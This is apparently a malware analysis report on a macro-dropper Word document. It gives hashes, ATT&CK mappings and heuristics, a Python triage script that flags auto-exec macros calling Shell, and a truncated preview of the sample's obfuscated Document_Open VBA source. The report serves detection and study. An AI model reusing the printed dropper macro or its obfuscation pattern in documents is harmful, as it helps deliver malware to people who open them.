Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c53d44f4d6056a3d…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 279.5 KB
Created: 2017-09-19 13:23:00
Authoring application: Microsoft Office Word
First seen: 2018-06-14
MD5: aba331968ada7925a1e70e0caeea4328
SHA-1: adde3a643e02322b84288bf66bc94964ede0e188
SHA-256: c53d44f4d6056a3d6d9f7d489b1dd2f2b6f4a73b3fe60f7ad08c44156b90e2bd
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a Microsoft Word document (OLE2 compound file) carrying a VBA project. Its 'Document_Open' procedure runs as soon as the document is opened with macros enabled and calls the VBA 'Shell()' function, i.e. it launches a command without any further user interaction. That pairing (automatic entry point plus process-execution primitive) is the standard pattern of a macro dropper that writes or downloads a second-stage payload and then executes it; the ClamAV detection name 'Doc.Dropper.Agent-6374902-0' independently classifies the file as a document dropper. Note that the extracted source (preview below) is heavily padded with obfuscation: junk string assignments, 'If Len(x) > N' guards that can never be true, and 'Trim(Mid(s, a op b, c op d))' calls whose constant arithmetic merely selects a short slice of a literal. The command handed to 'Shell()' is therefore assembled at runtime from such fragments and has to be recovered by deobfuscating the source or detonating the document in a sandbox.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6374902-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6374902-0
  • VBA macros detected [medium; 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro source calls the VBA Shell() function, which starts an external program or command
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    A Document_Open procedure is present; Word runs it automatically when the document is opened with macros enabled
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only or source-extraction-failure macro documents ("VBA stomping"), where the visible source is missing or does not match what Office actually executes.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
    • http://purl.org/dc/elements/1.1/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
    • http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
    • http://ns.adobe.com/exif/1.0/ (in document text, OLE body)
    • http://www.iec.ch (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    All ten are XML namespace or profile-reference URIs (Adobe XMP, RDF, Dublin Core, Photoshop/TIFF/EXIF schemas, the IEC sRGB profile reference, DrawingML) that typically arrive with the metadata of an embedded image. None of them is reached from the macro, so they are not network indicators for this sample.
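The OLE_VBA_DOCOPEN and OLE_VBA_SHELL findings above reduce to one rule: an auto-execution entry point combined with a process-execution primitive. As an added example (not part of this report or of the tooling that produced it), the Python below applies that rule to decoded VBA source and also handles the case the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic exists for, a source stream that yields no procedures at all. The three macros are constructed for illustration; the malicious one mirrors the shape described above (Document_Open calling Shell) but is not this sample's code, and the token lists are a starting set, not an exhaustive one.

```python
"""Triage decoded VBA source for the auto-exec + execution pairing that the
OLE_VBA_DOCOPEN and OLE_VBA_SHELL heuristics report. Added example; the three
macros below are constructed for illustration and are not this sample's code."""
import re

# Procedures Office runs without user interaction once macros are enabled
# (Word Document_* events, Excel Workbook_* events, legacy Auto* names).
AUTOEXEC_NAMES = ("Document_Open", "Document_Close", "Document_New",
                  "AutoOpen", "AutoClose", "AutoExec", "AutoNew",
                  "Auto_Open", "Auto_Close", "Workbook_Open", "Workbook_Close")

# Primitives that spawn a process, instantiate COM, or fetch/write a payload.
# Bare Shell is matched only when not preceded by '.' so that WScript.Shell
# is reported under its own label rather than twice.
EXEC_PATTERNS = {
    "Shell()":           r"(?<![\w.])Shell\b",
    "WScript.Shell":     r"\bWScript\.Shell\b",
    "CreateObject":      r"\bCreateObject\s*\(",
    "URLDownloadToFile": r"\bURLDownloadToFile",
    "XMLHTTP":           r"XMLHTTP",
    "ADODB.Stream":      r"\bADODB\.Stream\b",
    ".Run/.Exec":        r"\.(?:Run|Exec)\b",
}

_PROC_DECL = re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\b", re.I | re.M)


def find_autoexec(src: str) -> list:
    """Auto-execution procedures declared in src (VBA names are case-insensitive)."""
    return [name for name in AUTOEXEC_NAMES
            if re.search(r"\b(?:Sub|Function)\s+" + re.escape(name) + r"\s*\(", src, re.I)]


def find_exec_primitives(src: str) -> list:
    """Labels of execution/download primitives referenced anywhere in src."""
    return [label for label, pat in EXEC_PATTERNS.items() if re.search(pat, src, re.I)]


def triage(src: str) -> dict:
    autoexec = find_autoexec(src)
    execs = find_exec_primitives(src)
    if not _PROC_DECL.search(src):
        # Only Attribute lines (or nothing) came back from the source stream:
        # the macro may be p-code-only ("stomped"), so the compiled p-code has
        # to be inspected instead (e.g. with pcodedmp). This is the situation the
        # OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic covers.
        verdict = "no procedures in decoded source: inspect p-code"
    elif autoexec and execs:
        verdict = "auto-exec entry point with execution primitive"
    elif autoexec or execs:
        verdict = "needs review"
    else:
        verdict = "no auto-exec or execution primitive"
    return {"autoexec": autoexec, "exec": execs, "verdict": verdict}


# Constructed inputs (not taken from the sample).
MALICIOUS_SAMPLE = '''Attribute VB_Name = "ThisDocument"
Sub Document_Open()
part1 = "ab"
part2 = "cd"
Shell part1 & part2, vbHide
End Sub
'''

BENIGN_SAMPLE = '''Sub BoldHeadings()
Selection.Font.Bold = True
End Sub
'''

STOMPED_SAMPLE = '''Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE),
                       ("stomped", STOMPED_SAMPLE)):
        print(label, triage(src))
```

Run it on the output of olevba's source extraction; when the verdict reports no procedures even though OLE_VBA_MACROS fired, treat the p-code as the authoritative record of what the document will execute.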

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 81881 bytes
SHA-256: 4297c3ff2017261ed6916db53e36bc488e078680302d028b36abc22093733f91

Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
T69wR = "ExGhLw"
If Len(T69wR) > 248 Then
MsgBox "D1Bql4EcH", 1, IcGiAxBR
End If
FcihZ = "oXgjaRmU1"
If Len(FcihZ) > 248 Then
MsgBox "MxymNMUq", 1, jKdCwP
End If
FS91Fui75 = "Z81tWvY"
FS91Fui75 = Trim(Mid(FS91Fui75, 10067 - 10066, 10067 - 10066))
p9Dgzq = "swJD1aP6"
If Len(p9Dgzq) > 226 Then
MsgBox "lBfdQ", 41, Wa87ufB
End If
jTfWgVOnZ = "lMiNa4SuT"
jTfWgVOnZ = Trim(Mid(jTfWgVOnZ, 873 / 873, 873 / 873))
oLIQF = "MM9AP6fZL"
oLIQF = Trim(Mid(oLIQF, 1300 / 650, 1300 / 650))
C649cgIU = "J5JkQwUV"
If Len(C649cgIU) > 214 Then
MsgBox "NJsZjnUa0", 61, uu0pN7F
End If
Xzvd2yBa = "h3P6Zbed7"
Xzvd2yBa = Trim(Mid(Xzvd2yBa, 1300 / 650, 1300 / 650))
U6xgET8M9 = "iHc1oKW5j"
U6xgET8M9 = Trim(Mid(U6xgET8M9, -27458 + 27459, -27458 + 27459))
FC1Jk = "tYC3w"
If Len(FC1Jk) > 188 Then
MsgBox "MydfLe", 43, G0Sbn
End If
wjx93n = "QDxhwkpn6"
If Len(wjx93n) > 188 Then
MsgBox "OQjBbkdGL", 43, vy98usZ
End If
NY03x6Zd = "kXyjT"
If Len(NY03x6Zd) > 188 Then
MsgBox "iNSaL", 43, NbYD5Mdx3
End If
drKR9YO = "3cl1kLu"
wrXNTQxb0 = "9Wa"
QduHAC = "H753JOyw"
If Len(QduHAC) > 195 Then
MsgBox "VVEgaZ9C", 33, B8JS7
End If
rboz9Q2R = "U0v31Zsp"
If Len(rboz9Q2R) > 195 Then
MsgBox "m2CjTO", 33, e1pqcxfGm
End If
GkAwVy = "NtNc4kiPK"
GkAwVy = Trim(Mid(GkAwVy, 20205 / 4041, 20205 / 4041))
JV5lbdQI = "daj2l"
If Len(JV5lbdQI) > 196 Then
MsgBox "HTkePM3u7", 51, tLu4HrQIY
End If
z8IMR = "EN0SAeh"
If Len(z8IMR) > 196 Then
MsgBox "uYvOS6X", 51, XHmQSZ
End If
Dim QkK183
QkK183 = drKR9YO & wrXNTQxb0
yAnvgRrI9 = "l5kL"
PgvLMSxTq = "tVGdzl"
uoEb1 = "MR0sldce"
If Len(uoEb1) > 195 Then
MsgBox "KgJfKD", 29, mhv0TFsy5
End If
X7wmUiOv = "jcVvbx"
If Len(X7wmUiOv) > 195 Then
MsgBox "AaFywq", 29, N0kTfIy3t
End If
WmM0af = "PSTpd6"
If Len(WmM0af) > 195 Then
MsgBox "Sg4TO0Hd", 29, et3CoVkwP
End If
uB7TMZfh = "jtobmUk"
uB7TMZfh = Trim(Mid(uB7TMZfh, 16065 / 3213, 16065 / 3213))
PActslh = "klC62Z"
PActslh = Trim(Mid(PActslh, 16065 / 3213, 16065 / 3213))
vy0efUGxr = "StAgI"
If Len(vy0efUGxr) > 145 Then
MsgBox "MA6fPR", 60, rWpzVO
End If
Dim HV5Ue3Iv
HV5Ue3Iv = yAnvgRrI9 & PgvLMSxTq
jVmkeIqpl = "GZuFmcgQ3"
mPfcbAZI = Chr(89)
g7ywe0czq = "AAhtxa2fF"
g7ywe0czq = Trim(Mid(g7ywe0czq, 4345 - 4341, 4345 - 4341))
HPO2Dea = "MAMgEJRd"
HPO2Dea = Trim(Mid(HPO2Dea, 4345 - 4341, 4345 - 4341))
tkA28hORb = "NqXM5fk"
tkA28hORb = Trim(Mid(tkA28hORb, 4345 - 4341, 4345 - 4341))
OkzyQ = "M4CKaTYuX"
If Len(OkzyQ) > 216 Then
MsgBox "vTvcDSCF", 16, O3tYkhKs
End If
gBgZc24F = "f2Pcxh5e"
If Len(gBgZc24F) > 216 Then
MsgBox "yonlO", 16, P1XqQeUhw
End If
hB83b = "t6TRIL21g"
hB83b = Trim(Mid(hB83b, -8125 + 8129, -8125 + 8129))
mexRFE = "BrU9m"
mexRFE = Trim(Mid(mexRFE, -8125 + 8129, -8125 + 8129))
Dim HaiT8w
HaiT8w = jVmkeIqpl & mPfcbAZI
Toe7E0 = "GduQmZn"
ymFzr0Phe = "hnZ"
B3T2CMJ = "YKF9tPe"
If Len(B3T2CMJ) > 202 Then
MsgBox "CvV0I", 52, F30xN5s
End If
CiBalXT = "b4a0Y"
If Len(CiBalXT) > 202 Then
MsgBox "dsNg2a4j", 52, ozcQXf
End If
ZabdLZwWv = "zx2g0bC"
ZabdLZwWv = Trim(Mid(ZabdLZwWv, 753 - 750, 753 - 750))
usYV0K = "gsCWhaxGS"
If Len(usYV0K) > 182 Then
MsgBox "UDeW3k", 12, wKLIF6
End If
FXTCMgJ = "hMLhyS8k"
FXTCMgJ = Trim(Mid(FXTCMgJ, -984 + 986, -984 + 986))
nmf7k = "T13P0usE"
nmf7k = Trim(Mid(nmf7k, -984 + 986, -984 + 986))
dVAdJ = "MkLcu4Z"
If Len(dVAdJ) > 155 Then
MsgBox "O0Rmp", 57, gG5aSF3MR
End If
SQLO9MIdG = "hTRqoOh"
If Len(SQLO9MIdG) > 155 Then
MsgBox "PYIQfN", 57, HIH0whBk
End If
Dim l1jqS
l1jqS = Toe7E0 & ymFzr0Phe
HOqmNRC = "zRXb"
sH5V2IJDX = "n12My"
WxqFwVod = Chr(78)
NYhdqem = "VaACsft"
NYhdqem = Trim(Mid(NYhdqem, 10984 / 2746, 10984 / 2746))
HQ4zd = "jypZqzOA"
HQ4zd = Trim(Mid(HQ4zd, 10984 / 2746, 10984 / 2746))
e37Kjwz = "Dg4TQzJ8H"
e37Kjwz = Trim(Mid(e37Kj
... (truncated)